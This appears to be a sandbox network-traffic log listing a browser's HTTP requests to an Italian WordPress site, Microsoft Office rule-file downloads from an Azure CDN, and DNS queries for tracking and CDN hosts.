Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2017/02/AGRI_logo_white.png HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wpcf7-redirect/build/js/wpcf7r-fe.js?ver=1.1 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/vendor/slick.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/vendor/modernizr.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/lab-finder/labs.json?v=1732789978972 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.4 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/vendor/shuffle.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/vendor/magnific-popup.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/underscore.min.js?ver=1.13.4 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wpcf7-redirect/build/js/wpcf7r-fe.js?ver=1.1 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/frontend.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/dist/scripts/main.js?ver=2001211040 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2018/04/0001_02.jpg HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2018/04/0000_03.jpg HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2017/02/HeaderImage_0005_Agriculture.jpg HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/vendor/slick.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus-labor/images/MemberTagFooter.png?v=2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/vendor/modernizr.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/vendor/shuffle.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tailor/assets/js/dist/vendor/magnific-popup.min.js?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: u48396839.ct.sendgrid.net
Source: global trafficDNS traffic detected: DNS query: igacorp.conohawing.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
